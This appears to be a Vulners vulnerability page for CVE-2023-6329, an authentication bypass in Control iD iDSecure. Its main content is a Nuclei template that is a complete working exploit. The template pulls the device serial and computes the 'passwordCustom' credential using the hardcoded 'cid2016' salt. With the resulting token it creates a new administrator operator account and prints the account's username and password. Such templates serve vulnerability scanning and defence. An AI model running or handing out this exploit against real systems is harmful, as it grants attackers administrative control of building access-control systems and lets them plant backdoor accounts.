| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
| The vulnerability of the iDSecure access control system stems from deficiencies in the authentication process. This allows attackers to bypass the authentication procedures, gain unauthorized access to protected information, and increase their privileges. | 6 Dec 202300:00 | – | bdu_fstec | |
| CVE-2023-6329 | 17 Dec 202309:37 | – | circl | |
| Control iD iDSecure Security Breach | 27 Nov 202300:00 | – | cnnvd | |
| CVE-2023-6329 | 27 Nov 202316:34 | – | cve | |
| CVE-2023-6329 Control iD iDSecure passwordCustom Authentication Bypass | 27 Nov 202316:34 | – | cvelist | |
| Exploit for Improper Authentication in Controlid Idsecure | 11 Mar 202615:04 | – | githubexploit | |
| Control iD iDSecure Authentication Bypass (CVE-2023-6329) | 27 Aug 202418:53 | – | metasploit | |
| CVE-2023-6329 | 27 Nov 202317:15 | – | nvd | |
| CVE-2023-6329 | 27 Nov 202317:15 | – | osv | |
| Control ID IDSecure Authentication Bypass | 31 Aug 202400:00 | – | packetstorm |
id: CVE-2023-6329
info:
name: Control iD iDSecure - Authentication Bypass
author: DhiyaneshDK,princechaddha
severity: critical
description: |
An authentication bypass vulnerability exists in Control iD iDSecure v4.7.32.0. The login routine used by iDS-Core.dll contains a "passwordCustom" option that allows an unauthenticated attacker to compute valid credentials that can be used to bypass authentication and act as an administrative user.
impact: |
Successful exploitation could allow an attacker to bypass authentication controls.
remediation: |
Apply the vendor-supplied patch or update to the latest firmware version to mitigate the vulnerability.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-6329
cwe-id: CWE-287
epss-score: 0.65237
epss-percentile: 0.99156
cpe: cpe:2.3:a:controlid:idsecure:4.7.32.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: controlid
product: idsecure
fofa-query: body="iDSecure"
tags: cve,cve2023,auth-bypass,idsecure,control-id,intrusive,vuln,vkev
variables:
username: "{{rand_base(8)}}"
password: "{{randstr}}"
sha1Hash: "{{sha1(serial)}}"
passwordRandom: "{{rand_text_numeric(10)}}"
flow: |
http(1);
javascript();
http(2);
http(3);
javascript:
- code: |
var passwordRandom = passwordRandom;
var sha1Hash = template.sha1Hash;
var sha256Hash=(sha256combined.substring(0,6))
var passwordCustom = parseInt(sha256Hash, 16).toString();
passwordCustom
args:
sha1Hash: "{{sha1Hash}}"
sha256combined: "{{ sha256(sha1Hash+passwordRandom+'cid2016') }}"
passwordRandom: "{{passwordRandom}}"
http:
- raw:
- |
GET /api/login/unlockGetData HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- 'serial'
condition: and
internal: true
extractors:
- type: json
part: body
name: serial
internal: true
json:
- '.serial'
- raw:
- |
POST /api/login/ HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/json
{"passwordCustom": "{{javascript_response}}", "passwordRandom": "{{passwordRandom}}"}
matchers:
- type: word
part: body
words:
- 'accessToken'
condition: and
internal: true
extractors:
- type: json
part: body
name: access-token
internal: true
json:
- '.accessToken'
- raw:
- |
POST /api/operator/ HTTP/1.1
Host: {{Hostname}}
Authorization: Bearer {{access-token}}
Content-Type: application/json
{"idType": "1", "name": "{{username}}", "user": "{{username}}", "newPassword": "{{password}}", "password_confirmation": "{{password}}"}
matchers:
- type: dsl
dsl:
- 'contains(content_type, "application/json")'
- 'contains_all(body, "code", "newID")'
condition: and
extractors:
- type: dsl
dsl:
- '"USER: "+ username'
- '"PASS: "+ password'
# digest: 490a00463044022062313c3cecc1508b4baf5d390c82cc3fca84d8a2a153e754b4fd2f2cfdff12490220117836c86098ecbf967ffcc22280be4bb89ff42be32b00b75c07c14e0f117814:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation